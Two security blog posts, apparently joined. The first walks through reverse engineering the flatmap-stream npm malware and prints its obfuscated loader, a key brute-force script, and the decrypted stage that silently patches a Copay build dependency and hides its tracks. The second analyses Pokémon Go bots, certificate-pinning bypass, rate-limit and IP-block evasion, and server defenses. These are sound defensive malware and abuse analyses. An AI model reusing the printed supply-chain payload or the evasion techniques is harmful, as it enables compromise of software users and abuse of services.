Reverse Engineering JS by example

flatmap-stream payload A

In November, the npm package event-stream was compromised via a malicious dependency, flatmap-stream. The whole ordeal was written up here, and the focus of this post is to use it as a case study for reverse engineering JavaScript. The three payloads associated with flatmap-stream are simple enough to be easy to write about and complex enough to be interesting. While it is not critical to understand the backstory of this incident in order to follow this post, I will be making assumptions that may not be obvious if you aren’t somewhat familiar with the details.

Reverse engineering most JavaScript is more straightforward than reverse engineering the binary executables you run on your desktop OS – after all, the source is right in front of you – but JavaScript that is designed to be difficult to understand often goes through a few passes of obfuscation to obscure its intent. Some of this obfuscation comes from “minification”, the process of reducing the overall byte count of the source as much as possible to save space. This involves shortening variable names to single-character identifiers and translating expressions like true into shorter but equivalent forms like !0. Minification is mostly unique to JavaScript’s ecosystem because of its web browser origins; it is occasionally seen in node packages due to reuse of the same tools, and it is not intended to be a security measure. For basic reversal of common minification and obfuscation techniques, check out Shape’s unminify tool. Dedicated obfuscation passes may come from tools designed specifically to obfuscate code, or may be applied manually by the developer.
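As a hypothetical before-and-after (the function and its contents are made up purely for illustration), minification turns readable source into something like this:

// Original, readable source (hypothetical example):
function isFeatureEnabled(options) {
  return options.featureEnabled === true;
}

// Typical minified output: whitespace stripped, the identifier shortened to a
// single character, and `true` rewritten as the shorter-but-equivalent `!0`.
function e(n){return n.featureEnabled===!0}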

The first step is to get your hands on the isolated source for analysis. The flatmap-stream package was crafted specifically to look innocent except for a malicious payload included in only one version of the package, version 0.1.1. You can quickly see the changes to the source by diffing version 0.1.2 and version 0.1.1, or even just by alternating between the two URLs in two tabs. For the rest of the post we’ll refer to the appended source as payload A. Below is the formatted source of payload A.

! function() {
    try {
        var r = require,
            t = process;

        function e(r) {
            return Buffer.from(r, "hex").toString()
        }
        var n = r(e("2e2f746573742f64617461")),
            o = t[e(n[3])][e(n[4])];
        if (!o) return;
        var u = r(e(n[2]))[e(n[6])](e(n[5]), o),
            a = u.update(n[0], e(n[8]), e(n[9]));
        a += u.final(e(n[9]));
        var f = new module.constructor;
        f.paths = module.paths, f[e(n[7])](a, ""), f.exports(n[1])
    } catch (r) {}
}();

First things first: NEVER RUN MALICIOUS CODE (except in isolated environments). I’ve written my own tools to help me refactor code dynamically using the Shift suite of parsers and JavaScript transformers, but you can use an IDE like Visual Studio Code for the purposes of following along with this post.

When reverse engineering JavaScript it is valuable to keep the mental juggling to a minimum. This means getting rid of any expressions or statements that don’t add immediate value, and also reversing the DRYness of any code that has been optimized automatically or manually. Since we’re statically analyzing the JavaScript and tracking execution in our heads, the deeper the mental stack grows, the more likely it is we’ll get lost.

One of the simplest things you can do is unminify variables that are being assigned global properties like require and process, as on lines 3 and 4.

var r = require,
    p = process;

You can do this with any IDE that offers refactoring capabilities (usually by pressing “F2” over an identifier you want to rename). After that, we see a function definition, e, which appears to simply decode a hex string.

function e(r) {
    return Buffer.from(r, "hex").toString()
}

The first interesting line of code imports a file whose path is the result of the function e decoding the string "2e2f746573742f64617461".

var n = require(e("2e2f746573742f64617461")),

It is extremely common for deliberately obfuscated JavaScript to obscure any literal string value so that anyone who takes a passing glance won’t be alerted by particularly ominous strings or properties in clear view. Most developers recognize this is a very low hurdle, so you’ll often find trivially reversible encoding in place, and that’s no different here. The e function simply decodes hex strings, and you can do that manually with an online tool or with your own convenience function. Even if you’re confident that you understand what the e function is doing, it’s still a good idea not to run it (even if you extract it) with input found in a malicious file, because you have no guarantee that the attacker hasn’t found a security vulnerability that is triggered by the data.
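If you’d rather use a local convenience function than an online tool, a helper like this (written by you in a scratch file) does the job:

// A trivial hex-to-text helper for decoding strings by hand during analysis.
function decodeHex(hexString) {
  return Buffer.from(hexString, 'hex').toString('utf8');
}

console.log(decodeHex('2e2f746573742f64617461')); // -> './test/data'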

After decoding that string we see that the script is requiring a data file, './test/data', which is located in the distributed npm package.

module.exports = [
  "75d4c87f3[...large entry cut...]68ecaa6629",
  "db67fdbfc[...large entry cut...]349b18bc6e1",
  "63727970746f",
  "656e76",
  "6e706d5f7061636b6167655f6465736372697074696f6e",
  "616573323536",
  "6372656174654465636970686572",
  "5f636f6d70696c65",
  "686578",
  "75746638"
];

After renaming n to data and deobfuscating the calls e(n[2]) through e(n[9]), we start to get a better picture of what we’re dealing with.

(function () {
  try {
    var data = require("./test/data");
    var o = process["env"]["npm_package_description"];
    var u = require("crypto")["createDecipher"]("aes256", o);
    var a = u.update(data[0], "hex", "utf8");
    a += u.final("utf8");
    var f = new module.constructor;
    f.paths = module.paths;
    f["_compile"](a, "");
    f.exports(data[1]);
  } catch (r) {}
}());

It’s also easy to see why these strings were hidden: finding any reference to decryption in a simple flatmap library would be a dead giveaway that something is very wrong.

From here we see the script is importing node.js’s “crypto” library and, after looking up the API, we find that the second argument to createDecipher (o here) is the password used to decrypt. Now we can rename that argument and the subsequent return values to sensible names based on the API. Every time we find a new piece of the puzzle it’s important to immortalize it via a refactor or a comment, even if it’s a renamed variable that seems trivial. It’s very common, when diving through foreign code for hours, to lose your place, get distracted, or need to backtrack because of some erroneous refactor. Using git to save checkpoints during a refactor is valuable as well, but I’ll leave that decision to you. The code now looks as follows, with the e function deleted because it is no longer used, and the if (!o) return; statement removed because it doesn’t add value to the analysis.

(function () {
  try {
    var data = require("./test/data");
    var password = process["env"]["npm_package_description"];
    var decipher = require("crypto")["createDecipher"]("aes256", password);
    var decrypted = decipher.update(data[0], "hex", "utf8");
    decrypted += decipher.final("utf8");
    var newModuleInstance = new module.constructor;
    newModuleInstance.paths = module.paths;
    newModuleInstance["_compile"](decrypted, "");
    newModuleInstance.exports(data[1]);
  } catch (r) {}
}());

You’ll also notice I’ve renamed f to newModuleInstance. With code this short it’s not critical, but with code that might be hundreds of lines long, it’s important for everything to be as clear as possible.

Now payload A is largely deobfuscated and we can walk through it to understand what it does.

Line 3 imports our external data.

var data = require("./test/data");

Line 4 grabs a password out of the environment. process.env allows you to access environment variables from within a node script, and npm_package_description is a variable that npm, node’s package manager, sets when you run scripts defined in a package.json file.

var password = process["env"]["npm_package_description"];
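As a quick illustration of where that value comes from (the package name, description, and script below are made up), npm exposes every top-level package.json field to its scripts as npm_package_* environment variables:

// Given a package.json like:
//   {
//     "name": "demo-app",
//     "description": "An example description",
//     "scripts": { "demo": "node demo.js" }
//   }
// running `npm run demo` executes demo.js with the description in its environment:
console.log(process.env.npm_package_description); // -> "An example description"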

Line 5 creates a decipher instance using the value of npm_package_description as the password. This means the encrypted payload can only be decrypted when this script is executed via npm, and only for a particular project whose package.json contains a specific description field. That’s going to be tough.

var decipher = require("crypto")["createDecipher"]("aes256", password);

Lines 6 and 7 decrypt the first element of our external data file and store the result in the variable decrypted.

var decrypted = decipher.update(data[0], "hex", "utf8");
decrypted += decipher.final("utf8");

Lines 8-11 create a new module and then feed the decrypted data into the undocumented method _compile, which compiles and executes it. module.exports is node’s mechanism for exposing data from one module to another; here the decrypted code assigns a function to the new module’s exports, and newModuleInstance.exports(data[1]) then calls that function with the second element of our external data file, which is another encrypted payload.

var newModuleInstance = new module.constructor;
newModuleInstance.paths = module.paths;
newModuleInstance["_compile"](decrypted, "");
newModuleInstance.exports(data[1]);
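To make the mechanism concrete, here is a minimal sketch of the same trick using a harmless string in place of the decrypted payload. Note that _compile is an undocumented internal, so this leans on Node.js implementation details and may change between versions:

// Harmless stand-in for the decrypted source: it assigns a function to module.exports.
var source = 'module.exports = function (arg) { console.log("compiled module called with:", arg); };';

var fresh = new module.constructor();  // a brand new Module instance
fresh.paths = module.paths;            // reuse our resolution paths so require() works inside it
fresh._compile(source, '');            // compile and execute the source inside that module
fresh.exports('some argument');        // call whatever the compiled source exported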

At this point we have encrypted data that is only decryptable with a password found in a package.json somewhere, and whose decrypted contents get fed into the _compile method. Now we are left with a problem: how do you decrypt data when the password is unknown? This is a non-trivial question; if it were easy to brute force aes256 encryption, we’d have bigger problems than an npm package being taken over. Luckily we’re not dealing with a completely unknown set of possible passwords, just strings that happened to be entered into a package.json somewhere. package.json files originated as the file format for npm package metadata, so we may as well start at the official npm registry. Fortunately, there’s an npm package that gives us a stream of all package metadata.

There’s no guarantee our target file is located in an npm package; many non-npm projects use package.json to store configuration for node-based tools, and package.json descriptions can change from version to version, but it’s a good place to start. Multiple keys can “successfully” decrypt this payload into garbled gibberish, so we need some way of validating the output during the brute forcing process. Since we’re dealing with something that is fed to Module.prototype._compile, which ultimately passes it to vm.runInThisContext, we can reasonably assume the output is JavaScript, and we can use any number of JavaScript parsers to validate it. If a password fails outright, or if it succeeds but the parser throws an error, we move on to the next package.json. Conveniently, Shape Security has built its own set of JavaScript parsers for use in JavaScript and Java environments. The brute force script used is here:

const crypto = require('crypto');
const registry = require('all-the-packages')
const data = require('./test-data'); // the encrypted entries, copied from flatmap-stream's test/data
const { parseScript } = require('shift-parser');

let num = 0;
const start = Date.now();
registry
  .on('package', function (pkg) {
    num++;
    const password = pkg.description;
    const decrypted = decrypt(data[0], password);
    if (decrypted && parse(decrypted)) {
      console.log(`Password is '${password}' from ${pkg.name}@${pkg.version}`);
    }
  })
  .on('end', function () {
    const end = Date.now();
    console.log(`Done. Processed ${num} packages' metadata in ${(end - start) / 1000} seconds.`);
  })

function decrypt(data, password) {
  try {
    const decipher = crypto.createDecipher("aes256", password);
    let decrypted = decipher.update(data, "hex", "utf8");
    decrypted += decipher.final("utf8");
    return decrypted;
  } catch (e) {
    return false;
  }
}

function parse(input) {
  try { 
    parseScript(input);
    return true;
  } catch(e) {
    return false;
  }
}

After running this for 92.1 seconds and processing 740,543 packages we come up with our password, “A Secure Bitcoin Wallet”, which successfully decrypts the payload included below:

/*@@*/
module.exports = function(e) {
    try {
        if (!/build\:.*\-release/.test(process.argv[2])) return;
        var t = process.env.npm_package_description,
            r = require("fs"),
            i = "./node_modules/@zxing/library/esm5/core/common/reedsolomon/ReedSolomonDecoder.js",
            n = r.statSync(i),
            c = r.readFileSync(i, "utf8"),
            o = require("crypto").createDecipher("aes256", t),
            s = o.update(e, "hex", "utf8");
        s = "\n" + (s += o.final("utf8"));
        var a = c.indexOf("\n/*@@*/");
        0 <= a && (c = c.substr(0, a)), r.writeFileSync(i, c + s, "utf8"), r.utimesSync(i, n.atime, n.mtime), process.on("exit", function() {
            try {
                r.writeFileSync(i, c, "utf8"), r.utimesSync(i, n.atime, n.mtime)
            } catch (e) {}
        })
    } catch (e) {}
};

This was lucky. What could have been a monstrous brute forcing problem ended up needing fewer than a million iterations. The affected package containing the key in question turned out to be the client application of the bitcoin wallet Copay. The next two payloads dive deeper into that application itself and, given that the target application is centered around storing bitcoins, you can probably guess where this might be going.

If you find topics like this interesting and want to read an analysis for the other two payloads or future attacks, then be sure to “like” this post or let me know on twitter at @jsoverson.

Pokémon Go API – A Closer Look at Automated Attacks

Tens of millions of people are out exploring the new world of Pokémon Go. It turns out that many of those users are not people at all, but automated agents, or bots. Game-playing bots are not a new phenomenon, but Pokémon Go offers some new use cases for bots. These bots have started interfering with everyone’s fun by overwhelming Pokémon Go servers with automated traffic. Pokémon Go is a perfect case study in how automated attacks and defenses work on mobile APIs. At Shape we deal with these types of attacks every day, so we thought we would take a closer look at what happened with the Pokémon Go API attacks.

Pokémon Go API Attack

Niantic recently published a blog post detailing the problems bots were creating through the generation of automated traffic, which actually hindered their Latin America launch. The chart included in the post depicts a significant drop in spatial query traffic after Niantic rolled out countermeasures against the automation at 1pm PT on 08/03. The automated traffic appears to have been about twice that of the traffic from real human players. No wonder Pokémon Go servers were heavily overloaded in recent weeks.

Figure 1. Spatial query traffic dropped more than 50% since Niantic started to block scrapers. Source: Niantic blog post

Getting to Know The Pokémon Bots

There are two types of Pokémon bots. The first type of bot automates regular gameplay and is a common offender on other gaming apps, automating activities such as walking around and catching Pokémon. Examples of such bots include MyGoBot and PokemonGo-Bot. But Pokémon Go has inspired the development of a new type of bot, called a Tracker or Mapper, which provides the location of Pokémon. These bots power Pokémon Go mapping services such as Pokevision and Go Radar.

How a Pokémon Go Bot Works

A mobile API bot is a program that mimics communication between a mobile app and its backend servers—in this case servers from Niantic. The bot simply tells the servers what actions are taken and consumes the server’s response.

Figure 2 shows a screenshot of a Pokémon Go map which marks nearby Pokémon within a 3-footstep range of a given location. To achieve this, the bot makers usually follow these steps:

  1. Reverse-engineer the communication protocol between the mobile app and the backend server. The bot maker plays the game, captures the communications between the app and its server, and deciphers the protocol format.
  2. Write a program to make a series of “legitimate” requests to the backend servers to take actions. In this case, getting the locations of nearby Pokémon is a single request with a targeted GPS coordinate, with no need to actually walk to the physical location. The challenge for the bot is to bypass the server’s detection and look like a real human. (A purely hypothetical sketch of this step follows Figure 2 below.)
  3. Provide related features such as integration with Google Maps, or include the bot’s own mapping functionality for the user.

Figure 2. Screenshot of a Pokémon Go map
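To make step 2 concrete, here is a purely hypothetical sketch of a scanner bot’s core loop. None of the endpoint, header, or field names below come from the real (reverse-engineered) Pokémon Go protocol; they only show the shape of the technique (Node.js 18+ assumed for the global fetch):

// Hypothetical sketch only: fake endpoint, fake request format.
const GRID = [
  { lat: 37.7749, lng: -122.4194 },
  { lat: 37.7755, lng: -122.4180 },
  // ...more points covering the area to scan...
];

async function scan() {
  for (const point of GRID) {
    // One "legitimate-looking" request per GPS coordinate, with no need to
    // physically walk there.
    const res = await fetch('https://api.example.com/map/objects', {
      method: 'POST',
      headers: { 'content-type': 'application/json', authorization: 'Bearer <token>' },
      body: JSON.stringify({ latitude: point.lat, longitude: point.lng }),
    });
    const nearby = await res.json();
    console.log(point, nearby);

    // Pause between requests to look less like a machine (and to respect rate limits).
    await new Promise((resolve) => setTimeout(resolve, 5000));
  }
}

scan().catch(console.error);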

Mobile App Cracks and Defenses

Using the Pokémon Go app as an example, let’s examine how a mobile app is cracked via reverse engineering to reveal its secrets. Since attackers mainly exploited Pokémon Go’s Android app, let’s focus on Android app cracks and defenses.

Reverse-Engineering the Protocol

The Pokémon Go app and the backend servers communicate using ProtoBuf over SSL. ProtoBuf defines the data format transferred on the network. For example, here is an excerpt of the ProtoBuf definition for player stats:

message PlayerStats {
  int32 level = 1;
  int64 experience = 2;
  int64 prev_level_xp = 3;
  int64 next_level_xp = 4;
  float km_walked = 5;
  int32 pokemons_encountered = 6;
  int32 unique_pokedex_entries = 7;
  ……
}
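Once a definition like this is public, re-implementing the message layer is largely mechanical. As a rough sketch (assuming the third-party protobufjs package; only the fields from the excerpt above are used), encoding and decoding these messages takes just a few lines:

const protobuf = require('protobufjs'); // assumed third-party dependency

const definition = `
  syntax = "proto3";
  message PlayerStats {
    int32 level = 1;
    int64 experience = 2;
    int64 prev_level_xp = 3;
    int64 next_level_xp = 4;
    float km_walked = 5;
  }`;

const root = protobuf.parse(definition).root;
const PlayerStats = root.lookupType('PlayerStats');

// Serialize a message the same way a client built from these definitions would...
const buffer = PlayerStats.encode(PlayerStats.create({ level: 22, kmWalked: 41.5 })).finish();

// ...and decode responses the same way.
console.log(PlayerStats.decode(buffer)); // PlayerStats { level: 22, kmWalked: 41.5 }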

The Pokémon Go protocol was reverse-engineered and published online in the POGOProtos repository within only two weeks. How did this happen so quickly? Initially, Niantic didn’t use certificate pinning.

Certificate pinning is a common defense against man-in-the-middle attacks. In short, a mobile app only trusts server certificates that are embedded in the app itself. Without certificate pinning, an attacker can easily set up a proxy such as mitmproxy or Fiddler and install a certificate crafted by the attacker on her phone. She can then configure the phone to route traffic through the proxy and sniff the traffic between the Pokémon Go app and the Niantic servers. There is actually a Pokémon Go-specific proxy tool that facilitates this, called pokemon-go-mitm.

On July 31, Niantic made a big change to both its servers and the Pokémon Go app. Pokémon Go 0.31.0 was released with certificate pinning protection. Unfortunately, the cat was already out of the bag: the communication protocol was publicly available on GitHub. In addition, implementing certificate pinning correctly is not always easy. In later sections, we will cover some techniques commonly used by attackers to bypass certificate pinning.

APK Static Analysis

The Android application package (APK) is the package file format used by Android to install mobile apps. Android apps are primarily written in Java; the Java code is compiled into the dex format and built into an APK file. In addition, Android apps may also call shared libraries written in native code (via the Android NDK).

Dex files are easily disassembled into the Smali language using tools such as baksmali. Tools such as dex2jar and jd-gui go further and decompile a dex file into Java code, which is easy to read. Using these techniques, attackers decompiled the Pokémon Go Android app (versions 0.29.0 and 0.31.0) into Java code. The example code shown below, from the com.nianticlabs.nia.network.NianticTrustManager class, implements certificate pinning.

public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
  synchronized (this.callbackLock) {
    nativeCheckServerTrusted(chain, authType);
  }
}

When application source code is exposed, reverse engineering becomes a no-brainer. Pokemon Go Xposed used fewer than 100 lines of Java code to fool the Pokémon Go app into believing that the certificate from mitmproxy was the authentic certificate from Niantic.

How did Pokemon Go Xposed achieve this? Quite easily. The tool simply hooks the call to the checkServerTrusted function shown in the snippet above. The hook changes the function’s first parameter, chain, to the value of Niantic’s own certificate. This means that no matter what unauthorized certificate the proxy presents, the Pokémon Go app is tricked into trusting it.

There are many tools that can make disassembly and static analysis more difficult for attackers. ProGuard and DexGuard apply obfuscation to Java code and dex files; obfuscation makes the code difficult to read, even in decompiled form. Another approach is to use an Android packer to encrypt the app’s original classes.dex file. The encrypted dex file is decrypted in memory at runtime, making static analysis extremely hard, if not impossible, for most attackers. Using a native library is another way to significantly increase the difficulty of reverse-engineering an app.

Reverse-Engineering the Native Library

The most interesting cat-and-mouse game between the pokemongodev hackers and Niantic was around a field named “Unknown6”, contained in the signature sent with the map request used to get nearby Pokémon at a location. “Unknown6” was one of the unidentified fields in the reverse-engineered protobuf. Initially it didn’t matter what value Unknown6 was given; Niantic’s servers simply accepted it. Starting at 1pm PT on 08/03, all Pokémon Go bots suddenly could not find any Pokémon, which resulted in the significant query drop shown in Figure 1.

The hackers then realized the importance of the “Unknown6” field in the protocol, and initially suspected it to be some kind of digest or HMAC validating the integrity of the request. This triggered tremendous interest in the pokemongodev community, and an “Unknown6” team was quickly formed to crack the mysterious field. The Discord channel went private due to the flood of interest from coders and non-programmers alike, but a live update channel kept everybody informed of the cracking effort’s progress. After 3 days and 5 hours, on the afternoon of 08/06, the Unknown6 team claimed victory, releasing an updated Pokémon Go API that was once again able to retrieve nearby Pokémon.

While a technical writeup of the hack has yet to be released, many relevant tools and technologies were mentioned on the forums and in the live updates. IDA Pro from Hex-Rays is a professional tool able to disassemble the ARM code of a native library, and the Hex-Rays decompiler can decompile binary code into a C-style representation. These tools also allow attackers to perform dynamic analysis, debugging the mobile app and its libraries at run time. Of course, even with such powerful tools, reverse-engineering a binary program is still extremely challenging. Even without intentional obfuscation, disassembled or decompiled code is hard to understand, and the code size is often huge. As an illustration of the complex and unpredictable work involved, the live update channel and a subsequent interview described how the encryption function behind “Unknown6” was identified within hours, while the team spent an extensive amount of additional time analyzing another field, “Unknown22”, which turned out to be unrelated to Unknown6.

As a result, obfuscation still has many practical benefits for protecting native libraries. A high level of obfuscation in a binary can increase the difficulty of reverse-engineering by orders of magnitude. However, as the long history of cracked serial codes for Windows and Windows applications illustrates, motivated mobile crackers often get through eventually.

Server Side Protection

Server-side defenses work in a completely different way than client-side defenses. Here are some of the techniques used in the context of protecting Pokémon Go’s mobile API.

Rate limiting

Rate limiting is a common approach to try to stop, or at least slow down, automated traffic. In the early days, Pokémon scanners were able to send tens of requests per second, scan tens of cells, and find every Pokémon.

On 07/31, Niantic added rate limiting protections. If one account sent multiple map requests within ~5 seconds, Niantic’s servers would accept only the first request and drop the rest. Attackers reacted to these rate limits by:

  1. Adding a delay (~5 seconds) between map requests from their scanning programs
  2. Using multiple accounts and multiple threads to bypass the per-account limit
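Below is a minimal sketch of that kind of per-account window. The account header, response shape, and in-memory storage are assumptions for illustration, not details of Niantic’s actual implementation:

// Naive per-account rate limit: accept the first map request in a ~5 second
// window and silently drop the rest. Hypothetical Express-style handler.
const WINDOW_MS = 5000;
const lastMapRequest = new Map(); // accountId -> timestamp of last accepted request

function handleMapRequest(req, res) {
  const accountId = req.headers['x-account-id']; // hypothetical account identifier
  const now = Date.now();

  if (now - (lastMapRequest.get(accountId) || 0) < WINDOW_MS) {
    // Drop the query but still answer, so the client can't easily tell it was limited.
    return res.json({ mapCells: [] });
  }

  lastMapRequest.set(accountId, now);
  res.json({ mapCells: lookupNearbyObjects(req.body) });
}

function lookupNearbyObjects() {
  return []; // stub standing in for the real spatial query
}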

In the case of Pokémon Go, rate limiting just opened another battleground for automated attacks: automated account creation. It quickly became clear that while rate limiting is a fine basic technique for controlling overly aggressive scrapers or novice attackers, it does not prevent advanced adversaries from getting automated requests through.

IP Blocking

Blocking IPs is a traditional technique used by standard network firewalls and Web Application Firewalls (WAFs) to drop requests from suspicious IPs. There are many databases that track IP reputation, and firewalls and WAFs can retrieve such intelligence periodically.

In general, IP-based blocking is risky and ineffective. Blindly blocking an IP with a large volume of traffic may end up blocking the NAT of a university or corporation. Meanwhile, many Pokémon bots or scanners may use residential dynamic IP addresses. These IPs are shared by the customers of the ISPs, so banning an IP for a long time may block legitimate players.

Hosting services such as Amazon Web Services (AWS) and Digital Ocean are also sources of virtual machines, and therefore fresh IPs, for attackers. When attackers use stolen credit cards, they can even obtain these resources for free. However, legitimate users essentially never browse the web or play games from hosting services, so blocking IPs from hosting services is a safe defense and is commonly used on the server side. According to this forum post, Niantic may have decided to ban IPs from AWS.
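In its simplest form, that check is just “does the client IP fall inside a hosting provider’s published address ranges?” Here is a minimal IPv4-only sketch; the ranges and the helper itself are illustrative, not a real AWS block list:

// Convert a dotted-quad IPv4 address to a 32-bit unsigned integer.
function ipToInt(ip) {
  return ip.split('.').reduce((acc, octet) => (acc << 8) + Number(octet), 0) >>> 0;
}

// Check whether an IPv4 address falls inside a CIDR range like "54.160.0.0/12".
function inCidr(ip, cidr) {
  const [base, bits] = cidr.split('/');
  const mask = Number(bits) === 0 ? 0 : (~0 << (32 - Number(bits))) >>> 0;
  return (ipToInt(ip) & mask) === (ipToInt(base) & mask);
}

// Illustrative ranges only; real lists come from published provider data,
// e.g. https://ip-ranges.amazonaws.com/ip-ranges.json for AWS.
const hostingRanges = ['52.94.76.0/22', '54.160.0.0/12'];

function isHostingIp(ip) {
  return hostingRanges.some((cidr) => inCidr(ip, cidr));
}

console.log(isHostingIp('54.172.3.10')); // true with the ranges above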

Behavior Analysis

Behavior analysis is usually the last line of defense against advanced attackers who are able to bypass other defenses. Bots behave very differently from humans: a real person cannot play the game 24×7 or catch 5 Pokémon in one second. While behavioral analysis sounds like a promising approach, building an accurate detection system that can handle a data volume as large as Pokémon Go’s is not an easy task.

Niantic initially implemented a soft ban on cheaters who use GPS spoofing to “teleport” (i.e., suddenly move at an impossibly fast speed). It was probably a “soft” ban because of false positives: families share accounts and GPS readings can be inaccurate, making some legitimate use cases look like bots.

Around Aug 12, 2016, Niantic posted a note on its website outlining that violations of its terms of service may result in a permanent ban on a Pokémon Go account. Multiple ban rules targeting bots were also disclosed unofficially; for example, the over-catch rule reportedly bans accounts that catch over a thousand Pokémon in a single day. In addition, Niantic encourages legitimate players to report cheaters and inappropriate players.

In our experience, behavioral modeling-based detection can be extremely effective but is often technically or economically infeasible to build in-house. As Niantic commented in their blog post, “dealing with this issue also has opportunity cost. Developers have to spend time controlling this problem vs. building new features.” The bigger issue is that building technology to defend against dedicated, technically savvy adversaries, armed with botnets and other tools designed to bypass regular defenses, requires many highly specialized skillsets and a tremendous development effort.

The Game Isn’t Over

As Pokémon Go continues to be loved by players, the game between bot makers and Niantic will also continue. Defending against automated traffic represents a challenge not only for gaming but for all industries. Similar attack and defense activities are taking place across banking, airline, and retailer apps where the stakes are orders of magnitude higher than losing a few Snorlaxes. Bots and related attack tools aren’t fun and games for companies when their customers and users cannot access services because of unwanted automated traffic.